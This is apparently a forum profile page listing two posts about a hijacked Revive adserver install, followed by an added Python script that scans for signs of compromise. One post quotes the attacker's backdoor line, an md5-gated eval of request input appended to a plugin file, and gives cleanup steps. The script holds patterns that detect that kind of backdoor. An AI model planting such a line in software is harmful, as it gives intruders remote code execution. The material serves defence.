
Snaggy

Approved members
  • Posts

    10

Reputation Activity

  1. Like
    Snaggy reacted to rmu in Mobile ads have been hijacked   
    I had the same issue. The injection also changed my DB structure for the append column in the ox_zones table. No other files were modified, but I do believe the code put in the file did the other modification to put in the code that was added to the append column.

    I did also have another issue where an intruder logged into our system, the log said as me, and added the mobile redirection code directly to the ad creative. I added a different admin user, and removed my old one... I also reinstalled revive-adserver.

    I haven't seen any traffic since then of people poking around my admin area. Just tonight someone tried to do the fc.php injection. I already have PHP execution disabled in my images folder. The difference now is the permissions on the plugins folder. They are unable to write to that file now.

     
  2. Upvote
    Snaggy reacted to tvvpmi in Mobile ads have been hijacked   
    Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php
    Probably it has been modified, adding a line like this at the end:
    if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
    You have to remove it.
    Also you have to search in the "images folder" for some PHP script... and remove it. Perhaps you can send it privately to @Ian vM
    Clean the prepend code of your zones... via SQL or through the Revive backend. Search for iframes and JavaScript code.
    Disable PHP execution on the image folder, or move the image folder to "another place", as they are static files, and serve them through another subdomain. You don't need PHP for them.
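
Added example, not part of either post above and not Revive's own code: a Python check covering the cleanup steps tvvpmi lists. It flags PHP files under the images folder, lines in any PHP file that eval request input, and zone prepend/append values containing iframe or script tags. The `www/images` path, the `(zoneid, prepend, append)` row layout and the sample rows are assumptions made for illustration.

```python
import os
import re
import sys

# eval()/assert() fed straight from request input, the shape of the line quoted above.
BACKDOOR_RE = re.compile(r"\b(?:eval|assert)\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b")
# Markup the post says to search for in zone prepend/append code.
INJECT_RE = re.compile(r"<\s*(?:iframe|script)\b", re.IGNORECASE)
PHP_EXT = (".php", ".phtml", ".phar")

# Constructed rows standing in for an export of the zones table (assumed layout).
SAMPLE_ZONES = [
    (1, "", ""),
    (2, "", '<iframe src="//placeholder.invalid/m"></iframe>'),
]


def scan_install(root, images_dir="www/images"):
    """Return sorted (relative_path, reason) findings for an install tree."""
    findings = []
    prefix = images_dir.strip("/") + "/"
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if rel.startswith(prefix):  # static folder: no PHP expected here
                findings.append((rel, "php-in-images"))
            with open(path, "r", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if BACKDOOR_RE.search(line):
                        findings.append((rel, f"eval-of-request-input:{lineno}"))
    return sorted(findings)


def scan_zones(rows):
    """rows: (zoneid, prepend, append) tuples; returns (zoneid, column) to review."""
    hits = []
    for zoneid, prepend, append in rows:
        for column, value in (("prepend", prepend), ("append", append)):
            if value and INJECT_RE.search(value):
                hits.append((zoneid, column))
    return hits


if __name__ == "__main__":
    for finding in scan_install(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*finding)
    print(scan_zones(SAMPLE_ZONES))
```

Zone hits are candidates for manual review, since prepend/append fields can legitimately hold HTML; compare flagged files against a fresh copy of the same release before deleting anything.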